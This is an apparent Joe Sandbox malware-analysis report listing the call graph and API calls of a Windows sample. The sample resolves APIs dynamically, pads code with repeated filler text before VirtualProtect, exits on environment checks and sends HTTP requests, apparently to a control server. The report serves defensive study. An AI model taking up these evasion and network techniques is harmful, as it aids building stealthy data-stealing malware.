lstrcpy 27412->27413 27414 404a51 27413->27414 27415 41a9b0 4 API calls 27414->27415 27416 404a7d 27415->27416 27584 41a920 lstrcpy lstrcpy lstrcatA 27416->27584 27418 404a84 27419 41a8a0 lstrcpy 27418->27419 27420 404a8d 27419->27420 27421 404aa3 InternetConnectA 27420->27421 27421->27377 27422 404ad3 HttpOpenRequestA 27421->27422 27424 404b28 27422->27424 27425 404ebe InternetCloseHandle 27422->27425 27426 41a9b0 4 API calls 27424->27426 27425->27377 27427 404b3c 27426->27427 27428 41a8a0 lstrcpy 27427->27428 27429 404b45 27428->27429 27585 41a920 lstrcpy lstrcpy lstrcatA 27429->27585 27431 404b63 27432 41a8a0 lstrcpy 27431->27432 27433 404b6c 27432->27433 27434 41a9b0 4 API calls 27433->27434 27435 404b8b 27434->27435 27436 41a8a0 lstrcpy 27435->27436 27437 404b94 27436->27437 27438 41a9b0 4 API calls 27437->27438 27439 404bb5 27438->27439 27440 41a8a0 lstrcpy 27439->27440 27441 404bbe 27440->27441 27442 41a9b0 4 API calls 27441->27442 27443 404bde 27442->27443 27444 41a8a0 lstrcpy 27443->27444 27445 404be7 27444->27445 27446 41a9b0 4 API calls 27445->27446 27447 404c06 27446->27447 27448 41a8a0 lstrcpy 27447->27448 27449 404c0f 27448->27449 27586 41a920 lstrcpy lstrcpy lstrcatA 27449->27586 27451 404c2d 27452 41a8a0 lstrcpy 27451->27452 27453 404c36 27452->27453 27454 41a9b0 4 API calls 27453->27454 27455 404c55 27454->27455 27456 41a8a0 lstrcpy 27455->27456 27457 404c5e 27456->27457 27458 41a9b0 4 API calls 27457->27458 27459 404c7d 27458->27459 27460 41a8a0 lstrcpy 27459->27460 27461 404c86 27460->27461 27587 41a920 lstrcpy lstrcpy lstrcatA 27461->27587 27463 404ca4 27464 41a8a0 lstrcpy 27463->27464 27465 404cad 27464->27465 27466 41a9b0 4 API calls 27465->27466 27467 404ccc 27466->27467 27468 41a8a0 lstrcpy 27467->27468 27469 404cd5 27468->27469 27470 41a9b0 4 API calls 27469->27470 27471 404cf6 27470->27471 27472 41a8a0 lstrcpy 27471->27472 27473 404cff 27472->27473 27474 41a9b0 4 API calls 27473->27474 27475 404d1f 27474->27475 27476 41a8a0 lstrcpy 27475->27476 27477 404d28 27476->27477 27478 41a9b0 4 API calls 27477->27478 27479 404d47 27478->27479 27480 41a8a0 lstrcpy 27479->27480 27481 404d50 27480->27481 27588 41a920 lstrcpy lstrcpy lstrcatA 27481->27588 27483 404d6e 27484 41a8a0 lstrcpy 27483->27484 27485 404d77 27484->27485 27486 41a740 lstrcpy 27485->27486 27487 404d92 27486->27487 27589 41a920 lstrcpy lstrcpy lstrcatA 27487->27589 27489 404db3 27590 41a920 lstrcpy lstrcpy lstrcatA 27489->27590 27491 404dba 27492 41a8a0 lstrcpy 27491->27492 27493 404dc6 27492->27493 27494 404de7 lstrlenA 27493->27494 27495 404dfa 27494->27495 27496 404e03 lstrlenA 27495->27496 27591 41aad0 27496->27591 27498 404e13 HttpSendRequestA 27499 404e32 InternetReadFile 27498->27499 27500 404e67 InternetCloseHandle 27499->27500 27505 404e5e 27499->27505 27503 41a800 27500->27503 27502 41a9b0 4 API calls 27502->27505 27503->27425 27504 41a8a0 lstrcpy 27504->27505 27505->27499 27505->27500 27505->27502 27505->27504 27596 41aad0 27506->27596 27508 4117c4 StrCmpCA 27509 4117d7 27508->27509 27510 4117cf ExitProcess 27508->27510 27511 4117e7 strtok_s 27509->27511 27525 4117f4 27511->27525 27512 4119c2 27512->26429 27513 41199e strtok_s 27513->27525 27514 4118ad StrCmpCA 27514->27525 27515 4118cf StrCmpCA 27515->27525 27516 4118f1 StrCmpCA 27516->27525 27517 411951 StrCmpCA 27517->27525 27518 411970 StrCmpCA 27518->27525 27519 411913 StrCmpCA 27519->27525 27520 411932 StrCmpCA 27520->27525 27521 41185d StrCmpCA 27521->27525 27522 41187f StrCmpCA 27522->27525 27523 41a820 lstrlenA lstrcpy 27523->27525 27524 41a820 2 API calls 27524->27513 27525->27512 27525->27513 27525->27514 27525->27515 27525->27516 27525->27517 27525->27518 27525->27519 27525->27520 27525->27521 27525->27522 27525->27523 27525->27524 27526->26435 27527->26437 27528->26443 27529->26445 27530->26451 27531->26453 27532->26457 27533->26461 27534->26465 27535->26471 27536->26473 27537->26477 27538->26491 27539->26494 27540->26495 27541->26490 27542->26495 27543->26510 27544->26497 27545->26501 27546->26502 27547->26507 27548->26512 27549->26514 27550->26521 27551->26527 27552->26548 27553->26552 27554->26551 27555->26547 27556->26551 27557->26561 27560 41a7a0 lstrcpy 27559->27560 27561 401683 27560->27561 27562 41a7a0 lstrcpy 27561->27562 27563 401695 27562->27563 27564 41a7a0 lstrcpy 27563->27564 27565 4016a7 27564->27565 27566 41a7a0 lstrcpy 27565->27566 27567 4015a3 27566->27567 27567->27287 27592 401030 27568->27592 27572 404838 lstrlenA 27595 41aad0 27572->27595 27574 404848 InternetCrackUrlA 27575 404867 27574->27575 27575->27364 27577 409af9 LocalAlloc 27576->27577 27578 404eee 27576->27578 27577->27578 27579 409b14 CryptStringToBinaryA 27577->27579 27578->27386 27578->27389 27579->27578 27580 409b39 LocalFree 27579->27580 27580->27578 27581->27380 27582->27383 27583->27403 27584->27418 27585->27431 27586->27451 27587->27463 27588->27483 27589->27489 27590->27491 27591->27498 27593 40103a ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 27592->27593 27594 41aad0 27593->27594 27594->27572 27595->27574 27596->27508 27722 416ab1 902 API calls 27691 4069f3 7 API calls 27664 22f0297 131 API calls 27665 22fae93 43 API calls ctype 27724 41cafe 219 API calls 4 library calls 27726 22fcce9 162 API calls ___crtLCMapStringA 27760 22f19e7 StrCmpCA ExitProcess strtok_s strtok_s 27761 22f35e4 9 API calls 26168 401190 26175 4178e0 GetProcessHeap HeapAlloc GetComputerNameA 26168->26175 26170 40119e 26171 4011cc 26170->26171 26177 417850 GetProcessHeap HeapAlloc GetUserNameA 26170->26177 26173 4011b7 26173->26171 26174 4011c4 ExitProcess 26173->26174 26176 417939 26175->26176 26176->26170 26178 4178c3 26177->26178 26178->26173 27727 22f30f9 7 API calls 27728 41ce9f 69 API calls __amsg_exit 27729 22ef8f1 32 API calls 27668 4088a4 RaiseException task __CxxThrowException@8 27669 4180a5 GetProcessHeap HeapFree 27693 22f13c7 strtok_s strtok_s 27695 41b9b0 RtlUnwind 27734 22f3823 8 API calls 27736 22f30d0 9 API calls

                                  Executed Functions

                                  Function 004045C0 Relevance: 112.1, APIs: 34, Strings: 30, Instructions: 114stringmemoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045CC
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045D7
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045E2
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045ED
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 004045F8
                                  • GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,004169FB), ref: 00404607
                                  • RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,004169FB), ref: 0040460E
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040461C
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404627
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404632
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040463D
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404648
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040465C
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404667
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404672
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 0040467D
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,004169FB), ref: 00404688
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046B1
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046BC
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046C7
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046D2
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004046DD
                                  • strlen.MSVCRT ref: 004046F0
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404718
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404723
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472E
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404739
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404744
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404754
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040475F
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040476A
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404775
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404780
                                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0040479C
                                  Strings
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040474F
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046CD
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045D2
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045E8
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404662
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404770
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404657
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404729
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040477B
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404734
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C2
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471E
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040475A
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404678
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D8
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404713
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404765
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045F3
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040466D
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B7
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404683
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046AC
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040473F
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045C7
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004045DD
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                  • API String ID: 2127927946-2218711628
                                  • Opcode ID: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                  • Instruction ID: ff82eb6acc97b20701c4bcbd3dbf8f3289274c2dbbe7f73b68b52ee208cac3fc
                                  • Opcode Fuzzy Hash: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                  • Instruction Fuzzy Hash: 1D419979740624EBC718AFE5FC8DB987F71AB4C712BA0C062F90296190C7B9D5119B3E
                                  Function 00419860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 665 419860-419874 call 419750 668 419a93-419af2 LoadLibraryA * 5 665->668 669 41987a-419a8e call 419780 GetProcAddress * 21 665->669 671 419af4-419b08 GetProcAddress 668->671 672 419b0d-419b14 668->672 669->668 671->672 673 419b46-419b4d 672->673 674 419b16-419b41 GetProcAddress * 2 672->674 676 419b68-419b6f 673->676 677 419b4f-419b63 GetProcAddress 673->677 674->673 678 419b71-419b84 GetProcAddress 676->678 679 419b89-419b90 676->679 677->676 678->679 680 419bc1-419bc2 679->680 681 419b92-419bbc GetProcAddress * 2 679->681 681->680
                                  APIs
                                  • GetProcAddress.KERNEL32(75900000,008587A0), ref: 004198A1
                                  • GetProcAddress.KERNEL32(75900000,008587B8), ref: 004198BA
                                  • GetProcAddress.KERNEL32(75900000,00858860), ref: 004198D2
                                  • GetProcAddress.KERNEL32(75900000,008588A8), ref: 004198EA
                                  • GetProcAddress.KERNEL32(75900000,008587D0), ref: 00419903
                                  • GetProcAddress.KERNEL32(75900000,00883690), ref: 0041991B
                                  • GetProcAddress.KERNEL32(75900000,00856478), ref: 00419933
                                  • GetProcAddress.KERNEL32(75900000,00856658), ref: 0041994C
                                  • GetProcAddress.KERNEL32(75900000,00858908), ref: 00419964
                                  • GetProcAddress.KERNEL32(75900000,00858830), ref: 0041997C
                                  • GetProcAddress.KERNEL32(75900000,00883A98), ref: 00419995
                                  • GetProcAddress.KERNEL32(75900000,008838D0), ref: 004199AD
                                  • GetProcAddress.KERNEL32(75900000,008564F8), ref: 004199C5
                                  • GetProcAddress.KERNEL32(75900000,00883AB0), ref: 004199DE
                                  • GetProcAddress.KERNEL32(75900000,00883B40), ref: 004199F6
                                  • GetProcAddress.KERNEL32(75900000,008564D8), ref: 00419A0E
                                  • GetProcAddress.KERNEL32(75900000,00883918), ref: 00419A27
                                  • GetProcAddress.KERNEL32(75900000,008839F0), ref: 00419A3F
                                  • GetProcAddress.KERNEL32(75900000,00856678), ref: 00419A57
                                  • GetProcAddress.KERNEL32(75900000,008838E8), ref: 00419A70
                                  • GetProcAddress.KERNEL32(75900000,00856498), ref: 00419A88
                                  • LoadLibraryA.KERNEL32(00883930,?,00416A00), ref: 00419A9A
                                  • LoadLibraryA.KERNEL32(00883AC8,?,00416A00), ref: 00419AAB
                                  • LoadLibraryA.KERNEL32(00883AE0,?,00416A00), ref: 00419ABD
                                  • LoadLibraryA.KERNEL32(00883B28,?,00416A00), ref: 00419ACF
                                  • LoadLibraryA.KERNEL32(008838B8,?,00416A00), ref: 00419AE0
                                  • GetProcAddress.KERNEL32(75070000,00883B10), ref: 00419B02
                                  • GetProcAddress.KERNEL32(75FD0000,00883A80), ref: 00419B23
                                  • GetProcAddress.KERNEL32(75FD0000,00883A38), ref: 00419B3B
                                  • GetProcAddress.KERNEL32(75A50000,00883A50), ref: 00419B5D
                                  • GetProcAddress.KERNEL32(74E50000,008565B8), ref: 00419B7E
                                  • GetProcAddress.KERNEL32(76E80000,00883750), ref: 00419B9F
                                  • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00419BB6
                                  Strings
                                  • NtQueryInformationProcess, xrefs: 00419BAA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: NtQueryInformationProcess
                                  • API String ID: 2238633743-2781105232
                                  • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                  • Instruction ID: 20ebc6b46c949eaa7f25e90fb8197bb2e58582eade08509f86bd82c1d7e4afd5
                                  • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                  • Instruction Fuzzy Hash: 55A14DBD5C4240BFE354EFE8ED889963BFBF74E301704661AE605C3264D639A841DB12
                                  Function 00404880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 769 404880-404942 call 41a7a0 call 4047b0 call 41a740 * 5 InternetOpenA StrCmpCA 784 404944 769->784 785 40494b-40494f 769->785 784->785 786 404955-404acd call 418b60 call 41a920 call 41a8a0 call 41a800 * 2 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a920 call 41a8a0 call 41a800 * 2 InternetConnectA 785->786 787 404ecb-404ef3 InternetCloseHandle call 41aad0 call 409ac0 785->787 786->787 873 404ad3-404ad7 786->873 797 404f32-404fa2 call 418990 * 2 call 41a7a0 call 41a800 * 8 787->797 798 404ef5-404f2d call 41a820 call 41a9b0 call 41a8a0 call 41a800 787->798 798->797 874 404ae5 873->874 875 404ad9-404ae3 873->875 876 404aef-404b22 HttpOpenRequestA 874->876 875->876 877 404b28-404e28 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a9b0 call 41a8a0 call 41a800 call 41a920 call 41a8a0 call 41a800 call 41a740 call 41a920 * 2 call 41a8a0 call 41a800 * 2 call 41aad0 lstrlenA call 41aad0 * 2 lstrlenA call 41aad0 HttpSendRequestA 876->877 878 404ebe-404ec5 InternetCloseHandle 876->878 989 404e32-404e5c InternetReadFile 877->989 878->787 990 404e67-404eb9 InternetCloseHandle call 41a800 989->990 991 404e5e-404e65 989->991 990->878 991->990 992 404e69-404ea7 call 41a9b0 call 41a8a0 call 41a800 991->992 992->989
                                  APIs
                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
